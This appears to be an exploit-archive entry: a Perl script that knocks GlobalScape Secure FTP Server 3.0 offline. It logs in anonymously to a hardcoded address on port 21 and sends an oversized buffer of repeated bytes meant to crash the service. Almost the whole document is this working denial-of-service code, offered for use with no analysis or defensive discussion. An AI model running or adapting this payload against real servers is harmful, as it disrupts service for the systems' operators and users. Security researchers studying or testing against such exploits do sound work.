GlobalScape Secure FTP Server version 3.0 remote denial of service exploit.
733a02c760b22da5599eb73d06fe845b8c9f2a954d19d7d0065a7b0bb519d482
#!/usr/bin/perl
use strict;
use IO::Socket;
print "GlobalScape Secure FTP Server 3.0 - Denial of Service \n";
my $payload = "\x41\x42\x0a\x00"x147;
my $buffer = "\x41"x2043 . "\x41\x42\x43\x00" . "\x42"x36 . $payload;
my $sock = IO::Socket::INET->new(PeerAddr => '192.168.0.10', PeerPort => 21, Proto => 'tcp');
if ($sock) {
print "[+] Connected to FTP server\n";
print "[+] Sending Username\n";
print $sock "USER anonymous\r\n";
print "[+] Sending Password\n";
print $sock "PASS anonymous\r\n";
print "[+] Sending payload to exploit \nn";
print $sock $buffer . "\r\n";
print "[+] Exploit!\n";
close($sock);
} else {
print "Can't connect to FTP\n";
}